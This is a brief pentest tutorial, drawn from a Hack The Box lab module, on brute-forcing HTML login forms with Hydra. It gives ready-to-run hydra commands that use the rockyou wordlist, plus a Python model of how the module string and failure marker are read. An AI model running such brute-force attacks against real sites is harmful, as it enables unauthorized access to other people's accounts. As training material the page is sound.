Hydra

Usage

For HTML form-based authentication:

hydra example.com -s 8000 -l admin -P rockyou.txt http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u

Example

The example below is taken from Web Enumeration & Exploitation in HTB's Attacking Enterprise Networks module.

We find an HTTP login form (Figure 1), attempt a failed login, and select something unique from the source code of the HTTP response (Figure 2).

Figure 1: An HTTP login form.
Figure 2: A unique string within the source code of a failed login attempt.

Then, we pass this information to hydra and perform the brute-force attack (BFA) against the login form (Figure 3).

hydra -l admin -P /usr/share/wordlists/rockyou.txt monitoring.inlanefreight.local http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u
Figure 3: Performing a BFA on an HTTP login form.
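
As an added illustration (not taken from the HTB module or from Hydra's source), the Python below models how the http-post-form module string splits into path, body and condition, and how the F= failure string decides what gets reported. The response bodies are constructed samples and the substring match is a simplified model of the tool's behaviour.

```python
import re

# Constructed module string, same shape as the one used on this page.
MODULE = '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">'

# Constructed response bodies (not captured from any real host).
SAMPLES = {
    "failed":    '<html><div class="log-form">Invalid credentials</div></html>',
    "success":   '<html><h1>Dashboard</h1><a href="/logout.php">Logout</a></html>',
    "throttled": '<html><h1>429 Too Many Requests</h1></html>',
}

def parse_module(spec):
    """Split 'path:body:condition' on colons not escaped as '\\:'."""
    parts = [p.replace("\\:", ":") for p in re.split(r"(?<!\\):", spec)]
    if len(parts) < 3:
        raise ValueError("expected path:body:condition")
    path, body, cond = parts[:3]
    # F= is text expected on a failed login, S= text expected on a successful one;
    # a condition with no prefix is treated as a failure string.
    kind = "S" if cond.startswith("S=") else "F"
    marker = cond[2:] if cond[:2] in ("F=", "S=") else cond
    return {"path": path, "body": body, "kind": kind, "marker": marker}

def counts_as_valid(spec, response_text):
    """Simplified model: substring match decides whether a guess is reported."""
    found = spec["marker"] in response_text
    return found if spec["kind"] == "S" else not found

def classify_samples(module=MODULE):
    spec = parse_module(module)
    return {name: counts_as_valid(spec, text) for name, text in SAMPLES.items()}

if __name__ == "__main__":
    for name, valid in classify_samples().items():
        print(f"{name:10s} reported as valid login: {valid}")
```

The throttled response is classified as a valid login only because it lacks the failure marker, so a reported hit should be confirmed manually and the marker should be a string that appears on the failed-login page and nowhere else.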
